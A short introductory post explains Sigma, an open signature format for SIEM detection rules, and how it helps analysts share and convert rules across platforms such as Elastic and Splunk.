What is Sigma ? Sigma is a project presented as a generic and open signature format for SIEM detection rules. The idea is to provide a structured form in which researchers or analysts can describe their methods and share them with others.
Trying to uniformize detection rules used by SIEM seems to be a very technical thing to do. But, it is a very important step towards collaboration between teams in cybersecurity.
Having a database of generic SIEM detection rule would allow just about anyone to furbish their SIEM with relevant rules, without any concern for the technology they choose (or are imposed) and this may it be between analysts from big companies but different locations or as an open ressource for smaller companies that start taking cybersecurity seriously.
In addition, Sigma rules are a description of the rules, which makes them human readable and therefore verifiable. Sigma has also developed a converter that takes Sigma rules as input and transforms them into commonly used SIEM rules (Elastic, Splunk...).
Comments